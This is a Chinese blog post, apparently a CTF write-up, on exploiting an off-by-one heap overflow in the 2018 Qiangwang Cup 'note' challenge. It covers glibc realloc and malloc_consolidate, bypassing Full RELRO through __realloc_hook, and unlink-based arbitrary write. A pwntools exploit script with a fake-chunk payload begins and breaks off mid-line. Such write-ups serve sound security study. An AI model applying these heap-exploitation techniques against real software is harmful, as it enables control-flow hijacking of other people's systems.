<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-CN">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222">












<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=6.1.0" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.1.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.1.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.1.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.1.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '6.1.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="背景知识这个题目同样是2018强网杯线上赛的pwn题—-note，题目可以在这里下载。这里涉及到两个知识点：  1：malloc_consolidate对fastbin的合并。2：在程序开启RELRO技术之后，不能对GOT表进行改写的情况下，利用覆盖__realloc_hook来实现控制流劫持。  realloc函数的处理流程对于realloc函数，我以往的认识大概就是具有对指定地址堆块的重新分配">
<meta name="keywords" content="pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="fastbin的off-by-one利用技巧">
<meta property="og:url" content="http://cqlin1995.github.io/2018/07/27/fastbin的off-by-one利用技巧/index.html">
<meta property="og:site_name" content="Pur3uit">
<meta property="og:description" content="背景知识这个题目同样是2018强网杯线上赛的pwn题—-note，题目可以在这里下载。这里涉及到两个知识点：  1：malloc_consolidate对fastbin的合并。2：在程序开启RELRO技术之后，不能对GOT表进行改写的情况下，利用覆盖__realloc_hook来实现控制流劫持。  realloc函数的处理流程对于realloc函数，我以往的认识大概就是具有对指定地址堆块的重新分配">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2018-07-30T01:46:00.141Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="fastbin的off-by-one利用技巧">
<meta name="twitter:description" content="背景知识这个题目同样是2018强网杯线上赛的pwn题—-note，题目可以在这里下载。这里涉及到两个知识点：  1：malloc_consolidate对fastbin的合并。2：在程序开启RELRO技术之后，不能对GOT表进行改写的情况下，利用覆盖__realloc_hook来实现控制流劫持。  realloc函数的处理流程对于realloc函数，我以往的认识大概就是具有对指定地址堆块的重新分配">






  <link rel="canonical" href="http://cqlin1995.github.io/2018/07/27/fastbin的off-by-one利用技巧/"/>



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>fastbin的off-by-one利用技巧 | Pur3uit</title>
  









  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"> 

<div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Pur3uit</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">The quieter you become, the more you are able to hear!</p>
      
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        
          
  
  <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br />首页</a>
</li>

      
        
        
          
  
  <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />标签</a>
</li>

      
        
        
          
  
  <li class="menu-item menu-item-categories menu-item-active">
    <a href="/categories/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-th"></i> <br />分类</a>
</li>

      
        
        
          
  
  <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />归档</a>
</li>

      

      
    </ul>
  

  

  
</nav>


  



 </div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://cqlin1995.github.io/2018/07/27/fastbin的off-by-one利用技巧/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Pur3uit">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Pur3uit">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">fastbin的off-by-one利用技巧</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-07-27T19:14:36+08:00">2018-07-27</time>
            

            
            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/ctf/" itemprop="url" rel="index"><span itemprop="name">ctf</span></a></span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="背景知识"><a href="#背景知识" class="headerlink" title="背景知识"></a>背景知识</h3><p>这个题目同样是2018强网杯线上赛的pwn题—-note，题目可以在这里<a href="https://github.com/cqlin1995/cqlin1995.github.io/tree/master/2018/07/27/fastbin%E7%9A%84off-by-one%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7/note" target="_blank" rel="noopener">下载</a>。<br>这里涉及到两个知识点：</p>
<blockquote>
<p>1：malloc_consolidate对fastbin的合并。<br>2：在程序开启RELRO技术之后，不能对GOT表进行改写的情况下，利用覆盖__realloc_hook来实现控制流劫持。</p>
</blockquote>
<h3 id="realloc函数的处理流程"><a href="#realloc函数的处理流程" class="headerlink" title="realloc函数的处理流程"></a>realloc函数的处理流程</h3><p>对于realloc函数，我以往的认识大概就是具有对指定地址堆块的重新分配功能。如果新申请的内存大小小于或者等于原先的内存，那么就会返回原先的堆块指针;如果新申请的内存堆块大小大于原先的内存，那么就会新开辟一块内存返回给调用者，并将原先内存的内容拷贝到新申请的内存空间中。<br>但是，对于realloc是以怎样的步骤来申请新的内存的却不是很清楚。<br><a id="more"></a><br>和以往一样，查看一下源码，这里只关注原先的内存不够用的情况：<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Try to expand forward into top */</span></span><br><span class="line">      <span class="keyword">if</span> (next == av-&gt;top &amp;&amp; (<span class="keyword">unsigned</span> <span class="keyword">long</span>) (newsize = oldsize + nextsize) &gt;= (<span class="keyword">unsigned</span> <span class="keyword">long</span>) (nb + MINSIZE))</span><br><span class="line">        &#123;</span><br><span class="line">          set_head_size (oldp, nb | (av != &amp;main_arena ? NON_MAIN_ARENA : <span class="number">0</span>));</span><br><span class="line">          av-&gt;top = chunk_at_offset (oldp, nb);</span><br><span class="line">          set_head (av-&gt;top, (newsize - nb) | PREV_INUSE);</span><br><span class="line">          check_inuse_chunk (av, oldp);</span><br><span class="line">          <span class="keyword">return</span> chunk2mem (oldp);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">      <span class="comment">/* Try to expand forward into next chunk;  split off remainder below */</span></span><br><span class="line">      <span class="keyword">else</span> <span class="keyword">if</span> (next != av-&gt;top &amp;&amp; !inuse (next) &amp;&amp; (<span class="keyword">unsigned</span> <span class="keyword">long</span>) (newsize = oldsize + nextsize) &gt;= (<span class="keyword">unsigned</span> <span class="keyword">long</span>) (nb))</span><br><span class="line">        &#123;</span><br><span class="line">          newp = oldp;</span><br><span class="line">          unlink (av, next, bck, fwd);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">      <span class="comment">/* allocate, copy, free */</span></span><br><span class="line">      <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);</span><br><span class="line">          <span class="keyword">if</span> (newmem == <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">return</span> <span class="number">0</span>; <span class="comment">/* propagate failure */</span></span><br><span class="line"></span><br><span class="line">          newp = mem2chunk (newmem);</span><br><span class="line">          newsize = chunksize (newp);</span><br><span class="line"></span><br><span class="line">          <span class="comment">/*</span></span><br><span class="line"><span class="comment">             Avoid copy if newp is next chunk after oldp.</span></span><br><span class="line"><span class="comment">           */</span></span><br><span class="line">          <span class="keyword">if</span> (newp == next)</span><br><span class="line">            &#123;</span><br><span class="line">              newsize += oldsize;</span><br><span class="line">              newp = oldp;</span><br><span class="line">            &#125;</span><br><span class="line">          <span class="keyword">else</span></span><br><span class="line">            &#123;</span><br><span class="line">            </span><br><span class="line">            ...........</span><br><span class="line">             </span><br><span class="line">              _int_free (av, oldp, <span class="number">1</span>);</span><br><span class="line">              check_inuse_chunk (av, newp);</span><br><span class="line">              <span class="keyword">return</span> chunk2mem (newp);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure></p>
<blockquote>
<p>1：检查下一块是否是top chunk，如果是并且top chunk的size满足要求，则直接到top chunk中进行扩展原先的内存。<br>2：如果第一步不能满足，则检查下一块是否是空闲的chunk，如果是并且size满足要求，则从下一个chunk中进行扩充。<br>3：如果前两步都不能满足，就只能通过malloc申请新的内存空间，如果新申请的内存是原先内存的下一个chunk，则不进行复制，释放原内存的操作，直接将两块内存合并；如果新申请的内存不是原先内存的下一个chunk，就需要进行复制，释放原先内存的操作。</p>
</blockquote>
<p>在第三步进入malloc操作的时候，如果申请的内存过于大，以至于small bins中没有合适的内存块可以供使用，就会触发malloc_consolidate操作，这个操作会将fast bins中的所有chunk都取出来并进行合并。<br>上文，realloc操作的第三步，会对原先的内存进行free操作，如果原先的内存是属于fast bins的，结合这里的malloc_consolidate操作，会触发unlink操作。</p>
<h3 id="什么是RELRO技术，怎么绕过"><a href="#什么是RELRO技术，怎么绕过" class="headerlink" title="什么是RELRO技术，怎么绕过"></a>什么是RELRO技术，怎么绕过</h3><p>RELRO技术就是重定位只读技术，主要是为了防御针对修改GOT表的攻击。<br>重定位只读分为部分RELRO(Partial RELRO)与完全RELRO(Full RELRO)两种。</p>
<blockquote>
<p>部分RELRO:在程序装入后,将其中一些段(如.dynamic)标记为只读,防止程序的一些重定位信息被修改。<br>完全RELRO:在部分RELRO的基础上,在程序装入时,直接解析完所有符号并填入对应的值,此时所有的GOT表项都已初始化,且不装入link_map与_dl_runtime_resolve的地址(二者都是程序动态装载的重要结构和函数)。</p>
</blockquote>
<p>可以看到,当程序启用完全RELRO时,传统的GOT劫持的方式也不再可用。<br>但完全RELRO对程序性能的影响也相对较大,因为其相当于禁用了用于性能优化的动态装载机制,将程序中可能不会用到的一些动态符号装入,当程序导入的外部符号很多时,将带来一定程度的额外开销。<br>为了绕过RELRO，我们可以利用__realloc_hook的特性。<br>修改存在于glibc.data段的记录hook函数的指针变量__realloc_hook，若glibc发现此变量的值不为0，则在进行realloc操作时会直接调用此变量中记录的函数地址，从而达到劫持控制流的目的。</p>
<h3 id="note中的一字节堆溢出漏洞"><a href="#note中的一字节堆溢出漏洞" class="headerlink" title="note中的一字节堆溢出漏洞"></a>note中的一字节堆溢出漏洞</h3><p>note开启的安全措施<br><figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">pwndbg&gt;</span> <span class="string">checksec</span></span><br><span class="line"><span class="string">[*]</span> <span class="string">'/home/pur3uit/ctf/note/note'</span></span><br><span class="line"><span class="attr">    Arch:</span>     <span class="string">amd64-64-little</span></span><br><span class="line"><span class="attr">    RELRO:</span>    <span class="string">Full</span> <span class="string">RELRO</span></span><br><span class="line"><span class="attr">    Stack:</span>    <span class="string">Canary</span> <span class="string">found</span></span><br><span class="line"><span class="attr">    NX:</span>       <span class="string">NX</span> <span class="string">enabled</span></span><br><span class="line"><span class="attr">    PIE:</span>      <span class="literal">No</span> <span class="string">PIE</span> <span class="string">(0x3fd000)</span></span><br><span class="line"><span class="attr">    RUNPATH:</span>  <span class="string">'/home/pur3uit/build/build-2.25/lib/'</span></span><br></pre></td></tr></table></figure></p>
<p>这是note程序的一些主要操作：<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">user_function</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  setvbuf(<span class="built_in">stdin</span>, <span class="number">0L</span>L, <span class="number">2</span>, <span class="number">0L</span>L);</span><br><span class="line">  setvbuf(<span class="built_in">stdout</span>, <span class="number">0L</span>L, <span class="number">2</span>, <span class="number">0L</span>L);</span><br><span class="line">  setvbuf(<span class="built_in">stderr</span>, <span class="number">0L</span>L, <span class="number">2</span>, <span class="number">0L</span>L);</span><br><span class="line">  alarm(<span class="number">0x3C</span>u);</span><br><span class="line">  title = (<span class="keyword">char</span> *)<span class="built_in">malloc</span>(<span class="number">0x28</span>uLL);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"welcome to the note %d\n"</span>, title - first_chunk);</span><br><span class="line">  default_content_size = <span class="number">120</span>;</span><br><span class="line">  content_ptr = (<span class="keyword">char</span> *)<span class="built_in">malloc</span>(<span class="number">0x78</span>uLL);</span><br><span class="line">  comment = (<span class="keyword">char</span> *)<span class="built_in">malloc</span>(<span class="number">0x78</span>uLL);</span><br><span class="line">  change_content_limit = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">switch</span> ( start_function() )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">default</span>:</span><br><span class="line">        <span class="keyword">continue</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">1</span>:</span><br><span class="line">        change_title();</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">2</span>:</span><br><span class="line">        change_content();</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">3</span>:</span><br><span class="line">        change_comment();</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">4</span>:</span><br><span class="line">        show_content();</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">5</span>:</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">"Bye~"</span>);</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">6</span>:</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>note程序提供了一些操作，均涉及到对堆内存的操作，在change_title函数中，存在一个off-by-one漏洞。<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">char</span> *<span class="title">change_title</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> *result; <span class="comment">// rax@4</span></span><br><span class="line">  <span class="keyword">signed</span> <span class="keyword">int</span> v1; <span class="comment">// eax@5</span></span><br><span class="line">  <span class="keyword">char</span> v2; <span class="comment">// [sp+Bh] [bp-5h]@2</span></span><br><span class="line">  <span class="keyword">signed</span> <span class="keyword">int</span> v3; <span class="comment">// [sp+Ch] [bp-4h]@1</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"enter the title:"</span>);</span><br><span class="line">  v3 = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    v2 = getchar();</span><br><span class="line">    <span class="keyword">if</span> ( (<span class="keyword">unsigned</span> <span class="keyword">int</span>)check_badchar(v2) )</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">if</span> ( v3 &gt; <span class="number">39</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      result = title + <span class="number">39</span>;</span><br><span class="line">      title[<span class="number">39</span>] = <span class="number">0</span>;</span><br><span class="line">      <span class="keyword">return</span> result;</span><br><span class="line">    &#125;</span><br><span class="line">    v1 = v3++;</span><br><span class="line">    title[v1] = v2;</span><br><span class="line">  &#125;</span><br><span class="line">  result = (<span class="keyword">char</span> *)(<span class="keyword">unsigned</span> __int8)v2;</span><br><span class="line">  title[v3] = v2;                               <span class="comment">// 有一个字节发生溢出</span></span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>check_badchar函数会对输入的字符进行检查，如果输入的字符是预先定义的bad_char，则直接跳出循环。</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">bad</span> <span class="string">char</span></span><br><span class="line"><span class="string">.data:0000000000602010</span> <span class="string">;</span> <span class="string">char</span> <span class="string">bad_char[]</span></span><br><span class="line"><span class="string">.data:0000000000602010</span> <span class="string">bad_char</span>        <span class="string">db</span> <span class="number">0</span><span class="string">Ah</span>                                                          </span><br><span class="line"><span class="string">.data:0000000000602011</span>                 <span class="string">db</span>  <span class="number">21</span><span class="string">h</span> <span class="string">;</span> <span class="string">!</span></span><br><span class="line"><span class="string">.data:0000000000602012</span>                 <span class="string">db</span>  <span class="number">3</span><span class="string">Fh</span> <span class="string">;</span> <span class="string">?</span></span><br><span class="line"><span class="string">.data:0000000000602013</span>                 <span class="string">db</span>  <span class="number">40</span><span class="string">h</span> <span class="string">;</span> <span class="string">@</span></span><br><span class="line"><span class="string">.data:0000000000602014</span>                 <span class="string">db</span>  <span class="number">22</span><span class="string">h</span> <span class="string">;</span> <span class="string">"</span></span><br><span class="line"><span class="string">.data:0000000000602015                 db  27h ; '</span></span><br><span class="line"><span class="string">.data:0000000000602016                 db  23h ; #</span></span><br><span class="line"><span class="string">.data:0000000000602017                 db  26h ; &amp;</span></span><br><span class="line"><span class="string">.data:0000000000602018                 db    0</span></span><br></pre></td></tr></table></figure>
<p>这里存在一个问题，如果在v3等于40的时候，输入一个bad_char，就会发生一字节的溢出。由于title数组存在于堆上，所以会覆盖下一个堆块的size域，结合前面的两个知识点，就可以实现任意地址写操作。<br>我们可以利用<code>@</code>字符进行溢出。</p>
<h3 id="利用过程"><a href="#利用过程" class="headerlink" title="利用过程"></a>利用过程</h3><p>查看bss段的分布，可以发现title数组指针是一个非常好的利用点。<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">.bss:<span class="number">0000000000602050</span> change_content_limit dd ?               </span><br><span class="line">.bss:<span class="number">0000000000602050</span>                                         </span><br><span class="line">.bss:<span class="number">0000000000602054</span>                 align <span class="number">8</span></span><br><span class="line">.bss:<span class="number">0000000000602058</span> ; <span class="keyword">char</span> *comment</span><br><span class="line">.bss:<span class="number">0000000000602058</span> comment         dq ?                    </span><br><span class="line">.bss:<span class="number">0000000000602058</span>                                         </span><br><span class="line">.bss:<span class="number">0000000000602060</span> ; <span class="keyword">char</span> *content_ptr</span><br><span class="line">.bss:<span class="number">0000000000602060</span> content_ptr     dq ?                    </span><br><span class="line">.bss:<span class="number">0000000000602060</span>                                         </span><br><span class="line">.bss:<span class="number">0000000000602068</span> default_content_size dd ?               </span><br><span class="line">.bss:<span class="number">0000000000602068</span>                                         </span><br><span class="line">.bss:<span class="number">000000000060206</span>C                 align <span class="number">10</span>h</span><br><span class="line">.bss:<span class="number">0000000000602070</span> ; <span class="keyword">char</span> *title</span><br><span class="line">.bss:<span class="number">0000000000602070</span> title           dq ?                    </span><br><span class="line">.bss:<span class="number">0000000000602070</span></span><br></pre></td></tr></table></figure></p>
<p>为了触发unlink，我们需要两个连续的free chunk，通过调试可以发现，title正好是content的前一个chunk。<br>至此，我们的利用思路就很明显了：</p>
<blockquote>
<p>1：在title中伪造一个free chunk，其fd和bk值可以分别为title指针的减24和减16值，并通过off-by-one修改content的size域的inuse位为0。<br>2：在change_content操作中，可以先通过申请一个很大的内存，使得realloc必须执行上文的第三步，这样会使得原先的content被free掉，成为free状态的fast bin chunk。<br>3：上面申请的大内存必定和top chunk相邻，因此，这一步也需要再申请一个足够大内存，其大小必须大于top chunk和当前content的大小之和，由于这时fast bin中已经有内容，所以会触发malloc_consolidate操作，对fast bin进行合并，这时就会触发unlink，使得title指针指向了其自身减去24的位置，此时便可以实现任意地址写。</p>
</blockquote>
<p>利用代码如下：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line">p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">1234</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">title</span><span class="params">(Title)</span>:</span></span><br><span class="line">    p.recvuntil(<span class="string">'option---&gt;&gt;\n'</span>)</span><br><span class="line">    p.sendline(str(<span class="number">1</span>))</span><br><span class="line">    p.recvuntil(<span class="string">'enter the title:'</span>)</span><br><span class="line">    p.send(Title)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">content</span><span class="params">(Size,Content)</span>:</span></span><br><span class="line">    p.recvuntil(<span class="string">'option---&gt;&gt;\n'</span>)</span><br><span class="line">    p.sendline(str(<span class="number">2</span>))</span><br><span class="line">    p.recvuntil(<span class="string">'Enter the content size(64-256):'</span>)</span><br><span class="line">    p.sendline(str(Size))</span><br><span class="line">    p.recvuntil(<span class="string">'Enter the content:'</span>)</span><br><span class="line">    p.send(Content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">comment</span><span class="params">(Cmn)</span>:</span></span><br><span class="line">    p.recvuntil(<span class="string">'option---&gt;&gt;\n'</span>)</span><br><span class="line">    p.sendline(str(<span class="number">3</span>))</span><br><span class="line">    p.recvuntil(<span class="string">'Enter the comment:'</span>)</span><br><span class="line">    p.send(Cmn)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span><span class="params">()</span>:</span></span><br><span class="line">    p.recvuntil(<span class="string">'option---&gt;&gt;\n'</span>)</span><br><span class="line">    p.sendline(str(<span class="number">4</span>))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">exploit</span><span class="params">()</span>:</span></span><br><span class="line">    payload = p64(<span class="number">0</span>)+p64(<span class="number">0x20</span>)+p64(<span class="number">0x602070</span><span class="number">-0x18</span>)+p64(<span class="number">0x602070</span><span class="number">-0x10</span>)+p64(<span class="number">0x20</span>)</span><br><span class="line">    content(<span 